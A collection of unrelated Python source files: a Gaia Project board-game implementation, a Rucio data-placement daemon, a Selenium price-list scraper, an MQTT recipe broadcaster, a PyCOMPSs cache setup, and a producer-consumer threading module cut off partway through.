gaia_project.py
import os
import random
import sys
from threading import Thread
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
from PIL import Image
import constants as C
from automa import Automa
from federation import FederationToken
from player import Player
from research import Research
from scoring import Scoring
from universe import Universe
ROOT = os.path.dirname(__file__)
IMAGES = os.path.join(ROOT, "images")
class GaiaProject:
"""Class for combining all the different parts of the game."""
def __init__(self, player_count, screen, automa=False):
"""Create a new game of GaiaProject
Args:
player_count (int): Amount of players.
automa (bool): whether or not the player is playing against the
automa.
"""
self.player_count = player_count
self.screen = screen # Pygame Universe representation.
self.automa = automa
self.players = [] # A list with all the player objects in turn order.
self.board_setup()
def board_setup(self):
"""Setup all the pieces of the game."""
if self.automa:
amount = 2
else:
amount = 3
self.federation_tokens = [
FederationToken("FEDvps.png", amount, "vp12", "grey"),
FederationToken("FEDqic.png", amount, ["vp8", "qic1"], "green"),
FederationToken("FEDore.png", amount, ["vp7", "ore2"], "green"),
FederationToken(
"FEDcre.png", amount, ["vp7", "credits6"], "green"
),
FederationToken(
"FEDknw.png", amount, ["vp6", "knowledge2"], "green"
)
]
self.research_board = Research()
self.scoring_board = Scoring()
# Order of setup according to rules:
# 1. Choose first player (Against the automa, the human goes first).
# 2. Let the last player assemble the game board (or just some final
# rotation of tiles) or just do it together.
self.create_universe()
# 3. Randomly place the standard and advanced technology tiles.
self.research_board.randomise_tech_tiles()
# 4. Randomly select one federation token for the terraforming research
# track (Against the automa each type of token only has 2 pieces).
terraforming_fed_token = random.choice(self.federation_tokens)
terraforming_fed_token.count -= 1
self.research_board.terraforming.level5.reward = terraforming_fed_token
# 5. Randomly place 6 round scoring and 2 final scoring tiles on the
# scoring board.
self.scoring_board.randomise_scoring()
# 6. Randomly select {amount of players} + 3 booster tiles.
self.scoring_board.randomise_boosters(self.player_count)
# TESTING: uncomment the line below when finished. It gets commented out
# during testing because it keeps changing the image file, which is not
# necessary right now.
# Load the setup into an image to see it more easily as a human.
self.visual_setup()
def visual_setup(self):
"""Visualize the board setup.
Load setup into an image for better human readability.
"""
# Canvas with technology track backgrounds at the top.
with Image.open(os.path.join(ROOT,
"empty_setup.png")) as canvas:
# Terraforming setup.
# Placing the federation token.
with Image.open(os.path.join(IMAGES,
self.research_board.terraforming.level5.reward.img)) as fed:
canvas.paste(fed, (5, 35), fed)
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.terraforming.advanced.img)) as adv:
canvas.paste(adv, (160, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.terraforming.standard.img)) as std:
canvas.paste(std, (158, 127), std)
# Navigation setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.navigation.advanced.img)) as adv:
canvas.paste(adv, (330, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.navigation.standard.img)) as std:
canvas.paste(std, (328, 127), std)
# Artificial Intelligence setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.a_i.advanced.img)) as adv:
canvas.paste(adv, (500, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.a_i.standard.img)) as std:
canvas.paste(std, (496, 127), std)
# Gaia Project setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.gaia_project.advanced.img)) as adv:
canvas.paste(adv, (668, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.gaia_project.standard.img)) as std:
canvas.paste(std, (664, 127), std)
# Economy setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.economy.advanced.img)) as adv:
canvas.paste(adv, (836, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.economy.standard.img)) as std:
canvas.paste(std, (832, 127), std)
# Science setup.
with Image.open(os.path.join(IMAGES,
# Place the advanced tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.science.advanced.img)) as adv:
canvas.paste(adv, (1012, 3), adv)
with Image.open(os.path.join(IMAGES,
# Place the standard tile.
# Error is corrected at runtime so I can ignore this.
# pylint: disable=no-member
self.research_board.science.standard.img)) as std:
canvas.paste(std, (1008, 127), std)
# Free standard technology tiles setup.
x = 240
for free_tile in self.research_board.free_standard_technology:
with Image.open(os.path.join(IMAGES,
free_tile.img)) as free_std:
canvas.paste(free_std, (int(x), 260), free_std)
# To space the free tiles evenly apart
x += 240 * 1.4
# Booster tiles setup.
x = 30
for booster_tile in self.scoring_board.boosters:
with Image.open(os.path.join(IMAGES,
booster_tile.img)) as booster:
canvas.paste(booster, (int(x), 415), booster)
# To space the booster tiles evenly apart
x += 80 * 2.5
# Round scoring tiles setup.
x = 5
for round_tile in self.scoring_board.rounds:
with Image.open(os.path.join(IMAGES,
round_tile.img)) as round_:
canvas.paste(round_, (int(x), 745), round_)
# To space the round scoring tiles evenly apart
x += 100 * 1.6
# End scoring tiles setup.
y = 656
for end_tile in self.scoring_board.end_scoring:
with Image.open(os.path.join(IMAGES,
end_tile.img)) as end:
canvas.paste(end, (974, y), end)
# To space the end scoring tiles evenly apart
y += 140
canvas.save("Setup.png", "png")
def create_universe(self):
"""Function for setting up the universe
TODO:
In the future randomise the universe.
"""
self.universe = Universe(self.screen)
def player_setup(self):
"""Initialise Player objects."""
# TODO with more players: ask for factions here or assign them randomly.
# Choose faction (start with first player and going clockwise).
# See Faction.select_faction for available factions for human and
# Automa.select_faction for available factions for the Automa.
self.players.append(Player("Hadsch Halla"))
# If playing against the Automa, ask for the desired difficulty.
if self.automa:
print(
"What difficulty do you want to set the Automa to? Please type"
" the corresponding number."
)
for i, diff in enumerate(C.DIFFICULTY, start=1):
print(f"{i}. {diff}.")
while True:
choice = input("--> ")
if choice in [str(num + 1) for num in range(i)]:
chosen_difficulty = C.DIFFICULTY[int(choice) - 1]
break
else:
print("! Please only type one of the available numbers.")
continue
# Set desired difficulty.
self.players.append(Automa("Taklons", chosen_difficulty))
# Place players on level 0 of all research boards and check if they
# start on level 1 of any of them. Add the Level object to the Player
# object for easy access and insert the faction name of the player in
# the Level.players list.
for p in self.players:
name = p.faction.name
p.terraforming = self.research_board.terraforming.level0
self.research_board.terraforming.level0.players.append(name)
p.navigation = self.research_board.navigation.level0
self.research_board.navigation.level0.players.append(name)
p.a_i = self.research_board.a_i.level0
self.research_board.a_i.level0.players.append(name)
p.gaia_project = self.research_board.gaia_project.level0
self.research_board.gaia_project.level0.players.append(name)
p.economy = self.research_board.economy.level0
self.research_board.economy.level0.players.append(name)
p.science = self.research_board.science.level0
self.research_board.science.level0.players.append(name)
start_research = p.faction.start_research
if start_research:
levels = [
p.terraforming,
p.navigation,
p.a_i,
p.gaia_project,
p.economy,
p.science,
]
for i, track in enumerate(self.research_board.tech_tracks):
if track.name == start_research:
current_level = levels[i]
track.research(current_level, p, i)
# Place first structures (start with first player and going clockwise):
for player in self.players:
player.start_mine("first", self, self.players)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
for player in reversed(self.players):
player.start_mine("second", self, self.players)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
# Choose booster (start with last player and going counter-clockwise):
print("\nBooster selection.")
for player in reversed(self.players):
player.choose_booster(self.scoring_board)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
def play(self):
"""This function will setup and allow you to start playing a game."""
# During 6 rounds, cycle through the 4 phases of the game.
for rnd in self.scoring_board.rounds:
print(f"\nCurrent round {str(rnd).upper()}.")
self.passed = 0
# 1. Income phase followed by # 2. Gaia phase.
for player in self.players:
player.income_phase()
player.gaia_phase(self)
# 3. Action phase
while self.passed != len(self.players):
for player in self.players:
if not player.passed:
player.action_phase(self, rnd)
if type(player).__name__ == "Automa":
input("Press Enter to continue. --> ")
# 4. Clean up phase
# Reset Power/Q.I.C. actions.
for x in range(1, 11):
self.research_board.pq_actions[x] = True
# Reset all players special actions and set passed to false.
for player in self.players:
player.clean_up()
player.passed = False
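# Note: the "else" below belongs to the "for rnd in ..." loop (for/else), so
# end game scoring runs once after all six rounds have been played.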
else:
# End game scoring.
self.scoring_board.end_game_scoring(self)
def start_game(screen):
print("Gaia Project started.\n")
while True:
# TODO with more players: ask for the number of players here and whether
# you'll play against the automa.
player_count = 2
automa = True
new_game = GaiaProject(player_count, screen, automa=automa)
# Choose factions after the whole setup has been done.
print("The board has been set up. Please choose your factions.")
new_game.player_setup()
print("Factions have been chosen. The game will now start. Good luck.")
new_game.play()
# Pause the program to let the player recap a bit about the results.
input("Type enter if you are done playing the game.\n")
break
if __name__ == "__main__":
# TODO for testing only
# Open everything I need for testing the game.
def open_stuff():
# Gaia Project folder
os.startfile(
r"C:\Users\Gebruiker\Desktop\Programming\My Projects\Gaia Project"
)
# Rules
os.startfile("Gaia Project Rules - EN.pdf")
os.startfile("Gaia Project Automa Rules - EN.pdf")
# 2p map
os.startfile("default_2p_map.png")
# Research board
os.startfile("research_board.png")
# Visual Setup
os.startfile("Setup.png")
# Uncomment if files are opened.
# open_stuff()
# Start game
pygame.init()
size = (978, 1000)
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Gaia Project Universe")
CLOCK = pygame.time.Clock()
game = Thread(target=start_game, args=(screen,), daemon=True)
game.start()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
pygame.display.update()
CLOCK.tick(2)
c3po.py
# Copyright 2015-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Thomas Beermann <thomas.beermann@cern.ch>, 2015-2017
# - Vincent Garonne <vgaronne@gmail.com>, 2017-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
#
# PY3K COMPATIBLE
'''
Dynamic data placement daemon.
'''
import logging
from datetime import datetime
from hashlib import md5
from json import dumps
try:
from Queue import Queue
except ImportError:
from queue import Queue
from six import string_types
from sys import stdout
from time import sleep
from threading import Event, Thread
from uuid import uuid4
from requests import post
from requests.auth import HTTPBasicAuth
from requests.exceptions import RequestException
from rucio.client import Client
from rucio.common.config import config_get, config_get_options
from rucio.common.exception import RucioException
from rucio.common.types import InternalScope
from rucio.daemons.c3po.collectors.free_space import FreeSpaceCollector
from rucio.daemons.c3po.collectors.jedi_did import JediDIDCollector
from rucio.daemons.c3po.collectors.workload import WorkloadCollector
logging.basicConfig(stream=stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = Event()
def read_free_space(once=False, thread=0, waiting_time=1800):
"""
Thread to collect the space usage information for RSEs.
"""
free_space_collector = FreeSpaceCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('collecting free space')
free_space_collector.collect_free_space()
timer = 0
def read_workload(once=False, thread=0, waiting_time=1800):
"""
Thread to collect the workload information from PanDA.
"""
workload_collector = WorkloadCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('collecting workload')
workload_collector.collect_workload()
timer = 0
def print_workload(once=False, thread=0, waiting_time=600):
"""
Thread to regularly output the workload to logs for debugging.
"""
workload_collector = WorkloadCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('Number of sites cached %d' % len(workload_collector.get_sites()))
for site in workload_collector.get_sites():
logging.info('%s: %d / %d / %d' % (site, workload_collector.get_cur_jobs(site), workload_collector.get_avg_jobs(site), workload_collector.get_max_jobs(site)))
timer = 0
def read_dids(once=False, thread=0, did_collector=None, waiting_time=60):
"""
Thread to collect DIDs for the placement algorithm.
"""
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
did_collector.get_dids()
timer = 0
def add_rule(client, did, src_rse, dst_rse):
logging.debug('add rule for %s from %s to %s' % (did, src_rse, dst_rse))
r = client.add_replication_rule([did, ], 1, dst_rse, lifetime=604800, account='c3po', source_replica_expression=src_rse, activity='Data Brokering', asynchronous=True)
logging.debug(r)
def place_replica(once=False,
thread=0,
did_queue=None,
waiting_time=100,
dry_run=False,
sampling=False,
algorithms='t2_free_space_only_pop_with_network',
datatypes='NTUP,DAOD',
dest_rse_expr='type=DATADISK',
max_bytes_hour=100000000000000,
max_files_hour=100000,
max_bytes_hour_rse=50000000000000,
max_files_hour_rse=10000,
min_popularity=8,
min_recent_requests=5,
max_replicas=5):
"""
Thread to run the placement algorithm to decide if and where to put new replicas.
"""
try:
c3po_options = config_get_options('c3po')
client = None
if 'algorithms' in c3po_options:
algorithms = config_get('c3po', 'algorithms')
algorithms = algorithms.split(',')
if not dry_run:
if len(algorithms) != 1:
logging.error('Multiple algorithms are only allowed in dry_run mode')
return
client = Client(auth_type='x509_proxy', account='c3po', creds={'client_proxy': '/opt/rucio/etc/ddmadmin.long.proxy'})
vo = client.vo
instances = {}
for algorithm in algorithms:
module_path = 'rucio.daemons.c3po.algorithms.' + algorithm
module = __import__(module_path, globals(), locals(), ['PlacementAlgorithm'])
instance = module.PlacementAlgorithm(datatypes, dest_rse_expr, max_bytes_hour, max_files_hour, max_bytes_hour_rse, max_files_hour_rse, min_popularity, min_recent_requests, max_replicas)
instances[algorithm] = instance
params = {
'dry_run': dry_run,
'sampling': sampling,
'datatypes': datatypes,
'dest_rse_expr': dest_rse_expr,
'max_bytes_hour': max_bytes_hour,
'max_files_hour': max_files_hour,
'max_bytes_hour_rse': max_bytes_hour_rse,
'max_files_hour_rse': max_files_hour_rse,
'min_recent_requests': min_recent_requests,
'min_popularity': min_popularity
}
instance_id = str(uuid4()).split('-')[0]
elastic_url = config_get('c3po', 'elastic_url')
elastic_index = config_get('c3po', 'elastic_index')
ca_cert = False
if 'ca_cert' in c3po_options:
ca_cert = config_get('c3po', 'ca_cert')
auth = False
if ('elastic_user' in c3po_options) and ('elastic_pass' in c3po_options):
auth = HTTPBasicAuth(config_get('c3po', 'elastic_user'), config_get('c3po', 'elastic_pass'))
w = waiting_time
while not GRACEFUL_STOP.is_set():
if w < waiting_time:
w += 10
sleep(10)
continue
len_dids = did_queue.qsize()
if len_dids > 0:
logging.debug('(%s) %d did(s) in queue' % (instance_id, len_dids))
else:
logging.debug('(%s) no dids in queue' % (instance_id))
for _ in range(0, len_dids):
did = did_queue.get()
if isinstance(did[0], string_types):
did[0] = InternalScope(did[0], vo=vo)
for algorithm, instance in instances.items():
logging.info('(%s:%s) Retrieved %s:%s from queue. Run placement algorithm' % (algorithm, instance_id, did[0], did[1]))
decision = instance.place(did)
decision['@timestamp'] = datetime.utcnow().isoformat()
decision['algorithm'] = algorithm
decision['instance_id'] = instance_id
decision['params'] = params
create_rule = True
if sampling and 'error_reason' not in decision:
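# Sampling note (inferred from the expression below): the parity of the
# character code of the last hex digit of the DID's MD5 acts as a
# deterministic ~50% coin flip for whether a rule is actually created.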
create_rule = bool(ord(md5(decision['did']).hexdigest()[-1]) & 1)
decision['create_rule'] = create_rule
# write the output to ES for further analysis
index_url = elastic_url + '/' + elastic_index + '-' + datetime.utcnow().strftime('%Y-%m') + '/record/'
try:
if ca_cert:
r = post(index_url, data=dumps(decision), verify=ca_cert, auth=auth)
else:
r = post(index_url, data=dumps(decision))
if r.status_code != 201:
logging.error(r)
logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
except RequestException as e:
logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
logging.error(e)
continue
logging.debug(decision)
if 'error_reason' in decision:
logging.error('(%s:%s) The placement algorithm ran into an error: %s' % (algorithm, instance_id, decision['error_reason']))
continue
logging.info('(%s:%s) Decided to place a new replica for %s on %s' % (algorithm, instance_id, decision['did'], decision['destination_rse']))
if (not dry_run) and create_rule:
# DO IT!
try:
add_rule(client, {'scope': did[0].external, 'name': did[1]}, decision.get('source_rse'), decision.get('destination_rse'))
except RucioException as e:
logging.debug(e)
w = 0
except Exception as e:
logging.critical(e)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
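# Minimal sketch, added for illustration (not part of the original daemon):
# stop() matches the signal handler signature, so a launcher could register it
# for SIGINT/SIGTERM before calling run(), roughly like this.
def install_signal_handlers():
    """Register stop() for SIGINT and SIGTERM (illustrative only)."""
    import signal
    signal.signal(signal.SIGINT, stop)
    signal.signal(signal.SIGTERM, stop)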
def run(once=False,
threads=1,
only_workload=False,
dry_run=False,
sampling=False,
algorithms='t2_free_space_only_pop_with_network',
datatypes='NTUP,DAOD',
dest_rse_expr='type=DATADISK',
max_bytes_hour=100000000000000,
max_files_hour=100000,
max_bytes_hour_rse=50000000000000,
max_files_hour_rse=10000,
min_popularity=8,
min_recent_requests=5,
max_replicas=5):
"""
Starts up the main thread
"""
logging.info('activating C-3PO')
thread_list = []
try:
if only_workload:
logging.info('running in workload-collector-only mode')
thread_list.append(Thread(target=read_workload, name='read_workload', kwargs={'thread': 0, 'waiting_time': 1800}))
thread_list.append(Thread(target=print_workload, name='print_workload', kwargs={'thread': 0, 'waiting_time': 600}))
else:
logging.info('running in placement mode')
did_queue = Queue()
dc = JediDIDCollector(did_queue)
thread_list.append(Thread(target=read_free_space, name='read_free_space', kwargs={'thread': 0, 'waiting_time': 1800}))
thread_list.append(Thread(target=read_dids, name='read_dids', kwargs={'thread': 0, 'did_collector': dc}))
thread_list.append(Thread(target=place_replica, name='place_replica', kwargs={'thread': 0,
'did_queue': did_queue,
'waiting_time': 10,
'algorithms': algorithms,
'dry_run': dry_run,
'sampling': sampling,
'datatypes': datatypes,
'dest_rse_expr': dest_rse_expr,
'max_bytes_hour': max_bytes_hour,
'max_files_hour': max_files_hour,
'max_bytes_hour_rse': max_bytes_hour_rse,
'max_files_hour_rse': max_files_hour_rse,
'min_popularity': min_popularity,
'min_recent_requests': min_recent_requests,
'max_replicas': max_replicas}))
for t in thread_list:
t.start()
logging.info('waiting for interrupts')
while len(thread_list) > 0:
[t.join(timeout=3) for t in thread_list if t and t.is_alive()]
except Exception as exception:
logging.critical(exception)
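# Hedged usage sketch; the __main__ guard below is an assumption, not part of
# the original module: run the daemon in workload-collector-only mode and
# trigger a graceful stop on Ctrl+C.
if __name__ == '__main__':
    try:
        run(only_workload=True)
    except KeyboardInterrupt:
        stop()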
browser.py
'''
Copyright (c) 2019 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from random import choice
from threading import Thread
from selenium import webdriver
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
import webbrowser
from time import sleep
import json
import shutil
import re
import sys
import os
class BrowserServer(SimpleHTTPRequestHandler):
'''here we subclass SimpleHTTPServer to capture error messages
'''
def log_message(self, format, *args):
'''log to standard error with a date time string,
and then call any subclass specific logging functions
'''
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
# Workaround for error trying to GET html
if not re.search("div",format%args) and not re.search("function",format%args):
if re.search("404",format%args):
raise IOError(format%args)
def log_error(self, format, *args):
'''log_error
catch errors in the log_messages instead
'''
pass
class BrowserRobot(object):
''' bring up a server with a custom robot
Defaults
==========
pause_time: time to wait between browser commands
port: a random choice between 8000 and 9999
'''
def __init__(self, **kwargs):
self.Handler = BrowserServer
if "port" in kwargs:
self.port = kwargs['port']
else:
self.port = choice(range(8000,9999))
print('Selected port is %s' %self.port)
self.httpd = TCPServer(("", self.port), self.Handler)
self.server = Thread(target=self.httpd.serve_forever)
self.server.setDaemon(True)
self.server.start()
self.started = True
self.pause_time = 100
self.browser = None
self.headless = False
self.display = None
self.driver = "Chrome"
if "browser" in kwargs:
self.driver = kwargs['browser']
def get_and_wait(self, url, sleep_seconds=0):
'''a helper function to get a browser, apply a random implicit wait
between 0 and 2 seconds, load the url, and then sleep sleep_seconds'''
self.get_browser()
wait_time = choice([0, 0.25, 0.5, 0.75, 1, 1.5, 2])
self.browser.implicitly_wait(wait_time) # retry element lookups for up to wait_time seconds
self.browser.set_page_load_timeout(10)
self.get_page(url)
sleep(sleep_seconds)
def get_browser(self, name=None):
'''get_browser
return a browser if it hasn't been initialized yet
'''
if name is None:
name=self.driver
log_path = "%s-driver.log" % name.lower()
if self.browser is None:
options = self.get_options()
if name.lower() == "Firefox":
self.browser = webdriver.Firefox(service_log_path=log_path)
else:
self.browser = webdriver.Chrome(service_log_path=log_path,
options=options)
return self.browser
def get_options(self, width=1200, height=800):
'''return options for headless, no-sandbox, and custom width/height
'''
options = webdriver.ChromeOptions()
options.add_argument("headless")
options.add_argument("no-sandbox")
options.add_argument("window-size=%sx%s" %(width, height))
return options
def get_page(self, url, name='Chrome'):
'''get_page
open a particular url, checking for Timeout
'''
if self.browser is None:
self.browser = self.get_browser(name)
try:
return self.browser.get(url)
except TimeoutException:
print('Browser request timeout. Are you connected to the internet?')
self.browser.close()
sys.exit(1)
def stop(self):
'''close any running browser or server, and shut down the robot
'''
if self.browser is not None:
self.browser.close()
self.httpd.server_close()
if self.display is not None:
self.display.close()
def run_javascript(self, code):
'''run a snippet of javascript in the current browser, if any
'''
if self.browser is not None:
return self.browser.execute_script(code)
class ScraperRobot(BrowserRobot):
def __str__(self):
return "[browser-robot]"
def __repr__(self):
return "[browser-robot]"
def get_download_urls(self, url):
'''collect the charge sheet download urls from a price-list page
Parameters
==========
url: the url of the page to parse.
'''
self.get_and_wait(url)
prefix = "https://core.secure.ehc.com/src/util/detail-price-list"
links = []
for form_id in ["drg-file-name", "cm-file-name"]:
javascript = "return document.getElementById('%s');" % form_id
result = self.browser.execute_script(javascript)
filename = result.get_attribute('value')
link = "%s/%s" %(prefix, filename)
links.append(link)
return links
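# Hedged usage sketch; the __main__ guard and the command line argument are
# assumptions, not part of the original module: print the charge sheet links
# for a given price-list page url.
if __name__ == "__main__":
    robot = ScraperRobot()
    try:
        for link in robot.get_download_urls(sys.argv[1]):
            print(link)
    finally:
        robot.stop()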
recipes_broadcast.py
"""
Periodically sends the list of available recipes over MQTT.
"""
import threading
import time
import common.mqtt_messages as mqtt_messages
import common.mqtt_connection as mqtt_connection
import common.mqtt_topics as mqtt_topics
import server.database as database
_RECIPES_SECONDS_DELAY = 5
def _recipes_sender():
"""
Sends the recipes book every _RECIPES_SECONDS_DELAY seconds.
"""
while True:
recipes = [i for i in database.get_recipes().find()]
for i in recipes:
del i['_id']
recipes_book = mqtt_messages.build_recipes_book_from_dict({"recipes": recipes})
mqtt_connection.publish(mqtt_topics.AVAILABLE_RECIPES, recipes_book)
time.sleep(_RECIPES_SECONDS_DELAY)
def start_recipes_broadcast():
"""
Starts a thread handling the broadcast.
"""
threading.Thread(target=_recipes_sender).start()
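# Note (assumption, not in the original module): _recipes_sender loops forever,
# so running it as a daemon thread would let the hosting process exit cleanly:
# threading.Thread(target=_recipes_sender, daemon=True).start()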
setup.py
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Cache setup
====================
This file contains the cache setup and instantiation.
IMPORTANT: Only used with python >= 3.8.
"""
from multiprocessing import Process
from multiprocessing import Queue
from pycompss.worker.piper.cache.tracker import CacheTrackerConf
from pycompss.worker.piper.cache.tracker import cache_tracker
from pycompss.worker.piper.cache.tracker import start_shared_memory_manager as __start_smm__ # noqa: E501
from pycompss.worker.piper.cache.tracker import stop_shared_memory_manager as __stop_smm__ # noqa: E501
def is_cache_enabled(cache_config):
# type: (str) -> bool
""" Check if the cache is enabled.
:param cache_config: Cache configuration defined on startup.
:return: True if enabled, False otherwise.
"""
if ":" in cache_config:
cache, _ = cache_config.split(":")
cache = cache.lower() == "true"
else:
cache = cache_config.lower() == "true"
return cache
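# Illustrative examples, assuming the "<enabled>[:<size>]" format parsed above:
#   is_cache_enabled("true")         -> True
#   is_cache_enabled("true:100000")  -> True
#   is_cache_enabled("false:100000") -> False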
def start_cache(logger, cache_config):
# type: (..., str) -> (..., Process, Queue, dict)
""" Setup the cache process which keeps the consistency of the cache.
:param logger: Logger.
:param cache_config: Cache configuration defined on startup.
:return: Shared memory manager, cache process, cache message queue and
cache ids dictionary
"""
cache_size = __get_cache_size__(cache_config)
# Cache can be used
# Create a proxy dictionary to share the information across workers
# within the same node
from multiprocessing import Manager
manager = Manager()
cache_ids = manager.dict() # Proxy dictionary
# Start a new process to manage the cache contents.
smm = __start_smm__()
conf = CacheTrackerConf(logger, cache_size, None, cache_ids)
cache_process, cache_queue = __create_cache_tracker_process__("cache_tracker", conf) # noqa: E501
return smm, cache_process, cache_queue, cache_ids
def stop_cache(shared_memory_manager, cache_queue, cache_process):
# type: (..., Queue, Process) -> None
""" Stops the cache process and performs the necessary cleanup.
:param shared_memory_manager: Shared memory manager.
:param cache_queue: Cache messaging queue.
:param cache_process: Cache process
:return: None
"""
__destroy_cache_tracker_process__(cache_process, cache_queue)
__stop_smm__(shared_memory_manager)
def __get_cache_size__(cache_config):
# type: (str) -> int
""" Retrieve the cache size for the given config.
:param cache_config: Cache configuration defined on startup.
:return: The cache size
"""
if ":" in cache_config:
_, cache_size = cache_config.split(":")
cache_size = int(cache_size)
else:
cache_size = __get_default_cache_size__()
return cache_size
def __get_default_cache_size__():
# type: () -> int
""" Returns the default cache size.
:return: The size in bytes.
"""
# Default cache_size (bytes) = total_memory (bytes) / 4
mem_info = dict((i.split()[0].rstrip(':'), int(i.split()[1]))
for i in open('/proc/meminfo').readlines())
cache_size = int(mem_info["MemTotal"] * 1024 / 4)
return cache_size
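# Worked example with illustrative numbers: if /proc/meminfo reports
# MemTotal: 16384256 kB, the default cache size is 16384256 * 1024 / 4
# = 4194369536 bytes, i.e. roughly 4.2 GB (a quarter of total memory).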
def __create_cache_tracker_process__(process_name, conf):
# type: (str, CacheTrackerConf) -> (Process, Queue)
""" Starts a new cache tracker process.
:param process_name: Process name.
:param conf: cache config.
:return: The cache tracker process and its message queue.
"""
queue = Queue()
process = Process(target=cache_tracker, args=(queue, process_name, conf))
process.start()
return process, queue
def __destroy_cache_tracker_process__(cache_process, cache_queue):
# type: (Process, Queue) -> None
""" Stops the given cache tracker process.
:param cache_process: Cache process
:param cache_queue: Cache messaging queue.
:return: None
"""
cache_queue.put("QUIT") # noqa
cache_process.join() # noqa
cache_queue.close() # noqa
cache_queue.join_thread() # noqa
producer_consumer.py
# coding: utf-8
import threading
from datetime import datetime
from time import sleep
MESSAGE_CACHE = []
def log(msg):
print('[' + str(datetime.now().second) + ']' + msg)
class Producer(threading.Thread):
def __init__(self, event, message_count=100):
super(Producer, self).__init__()
self.producer_event = threading.Event()
self.producer_event.clear()
self.consumer_event = event
self.message_count = message_count
self.interval = 1
self.cache = []
self.complete = False
def run(self):
produce_thread = threading.Thread(target=self._produce)
produce_thread.start()
send_thread = threading.Thread(target=self._send)
send_thread.start()
produce_thread.join()
send_thread.join()
def _produce(self):
count = 1
while count <= self.message_count:
log('Produce message--->%s.' % count)
self.cache.append(count)
# Notify the sending thread that a message has been produced
self.producer_event.set()
sleep(self.interval)
count += 1
self.complete = True
def _send(self):
log('Start to send message.')
while True:
if len(MESSAGE_CACHE) >= 5:
# When the message cache is full, wait for the consumers to consume
